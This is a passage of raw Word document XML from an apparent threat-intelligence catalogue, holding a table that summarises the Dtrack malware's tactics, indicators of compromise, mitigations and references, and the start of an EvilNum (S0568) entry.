              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D439B90" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses encrypted configuration data, obfuscated code, stealthy file placement, and disguised process names to evade detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="09561794" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA8DBA3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AFEBAEE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supports keylogging and credential collection through keyboard monitoring and data harvesting modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7BD0268C" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D33772" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3002F079" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Collects detailed system information, network configuration data, process information, and local file system details from compromised hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="25BB8878" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B63CBD5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8F97B3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Can support attacker-driven lateral movement through remote command execution and deployment of additional payloads within internal networks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="1358D490" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="266F204A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10366F4F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Communicates with attacker-controlled infrastructure using HTTP/HTTPS and other application-layer protocols to receive commands and transmit stolen data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="1083AE2A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DF47E4" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD5DCC7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltrates collected system information, credentials, keystrokes, and files through encrypted command-and-control channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2B8A49C5" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BD3C14" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B6954B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enables long-term espionage, credential theft, reconnaissance, and remote control of compromised systems. Frequently used in financially motivated and nation-state operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="782D73F4" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="733CD724" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00167259" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious services, unauthorized scheduled tasks, unusual outbound network connections, encrypted configuration files, keylogging behavior, unknown executables in system directories, and abnormal remote command execution activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="61D0BF41" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C65D9E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F022EF9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitor process creation and outbound traffic, detect keylogging behavior, enable EDR monitoring, restrict administrative privileges, apply network segmentation, use file integrity monitoring, and monitor persistence mechanisms such as services and scheduled tasks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6D1BD018" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20460552" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3946D310" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Dtrack S0567</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Kaspersky Dtrack Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>CISA Hidden Cobra Guidance</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Symantec Threat Intelligence</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78D25D85" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B54F004" w14:textId="09A3CD6E" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">EvilNum </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0568</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4"/>
        <w:gridCol w:w="8974"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="104C993D" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456BFD4D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AE14CCF" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7A2BB482" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659F6C2F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30063BAA" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>EvilNum (S0568)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Backdoor / Spyware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0D256A4A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79B8D190" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
